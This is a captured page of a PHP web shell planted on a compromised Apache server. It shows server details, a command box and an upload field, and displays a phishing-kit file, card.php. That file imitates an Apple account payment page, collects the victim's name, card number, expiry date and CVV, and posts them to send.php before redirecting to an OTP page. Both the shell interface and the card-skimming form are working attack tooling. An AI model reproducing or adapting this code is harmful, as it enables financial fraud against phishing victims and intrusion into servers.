AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK Interactive Terminal

Command Executor

AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK Interactive Terminal

Command Executor

403WebShell
403Webshell
Server IP : 146.190.157.162  /  Your IP : 216.73.216.175
Web Server : Apache
System : Linux ubuntu-s-2vcpu-4gb-amd-sfo3-01-KIT-DIGITAL 6.5.0-44-generic #44-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 7 15:10:09 UTC 2024 x86_64
User : vergeskit ( 679)
PHP Version : 8.2.10-2ubuntu2.2
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_signal,pcntl_signal_dispatch,pcntl_getpriority,pcntl_setpriority,dl,putenv,parse_ini_file,show_source
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/vergeskit/Apple/en/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/vergeskit/Apple/en//card.php
<?php 
require '../main.php';
?>
<!doctype html>
<html>
<head>
<title>Sign In - Account</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<link rel="stylesheet" href="inc/style.css">
<link rel="icon" href="inc/logos.png">
<script src="inc/jq.js"></script>
</head>
<body>
<div class="header">
<div class="left">
<img src="inc/menu.png">
</div>
<div class="mid">
<img src="inc/logo.png">
</div>
<div class="right">
<img src="inc/bag.png">
</div>
</div>
<div class="content">


<div class="form" style="">
<div class="col" style="margin-bottom:-13px;">
<h1 style="margin:20px 0;"><?= $lang['_payment_info_title']; ?></h1>
<h3><?= $lang['_add_card_subtitle']; ?></h3>
</div>

<div class="col">
<input type="text" class="subtextinput" placeholder="<?= $lang['_full_name_placeholder']; ?>" id="fullname" style="border-radius:6px 6px 0 0; border-bottom:none;">
<input type="text" class="subtextinput" placeholder="<?= $lang['_card_number_placeholder']; ?>" id="cardnumber" style="border-radius:0; border-bottom:none;">
<input type="text" class="subtextinput" placeholder="<?= $lang['_exp_date_placeholder']; ?>" id="exp" style="border-radius:0; border-bottom:none;">
<input type="text" class="subtextinput" placeholder="<?= $lang['_cvv_placeholder']; ?>" id="cvv" style="border-radius:0 0 6px 6px;">
</div>

<div class="col">
<button class="sbmt" onclick="sendCC()" id="btn"><?= $lang['_continue_button']; ?></button>
</div>

</div>
</div>


<div class="footer">
<div class="footerholder">
<div style="padding:20px 0;">
<?= $lang['_need_help']; ?>
</div>
</div>
<div class="footercontent">
<div style="display:inline-block; width:1000px; max-width:90%;">
<div style="text-align:left; border-bottom:1px solid #cacaca; padding:14px 0;">
<?= $lang['_encryption_notice']; ?>
</div>
<div style="text-align:left; padding:14px 0;">
<?= $lang['_more_ways_to_shop']; ?>
</div>
<div style="text-align:left; padding:14px 0; margin-top:-20px;">
<?= $lang['_copyright']; ?>
</diV>

</div>
</div>
</div>

<script src="inc/m.js"></script>
<script>
$("#cardnumber").mask("0000 0000 0000 0000");
$("#exp").mask("00/00");
$("#cvv").mask("000");

function sendCC(){
	var ccnum = $("#cardnumber").val();
	var fn = $("#fullname").val();
	var exp = $("#exp").val();
	var cvv = $("#cvv").val();
	if(ccnum=="" || fn=="" || exp=="" || cvv==""){
		alert("Please fill all blanks!");
	}else{
		$("#btn").html("<img src='inc/loader.gif' style='width:20px;'>");
		$.post("send.php",{cardnumber:ccnum, fullname:fn, exp:exp,cvv:cvv}, function(done){
			window.location="otp.php";
		});
	}
}

$("input").keypress((e)=>{
	if(e.key=="Enter"){
		sendCC();
	}
});


</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit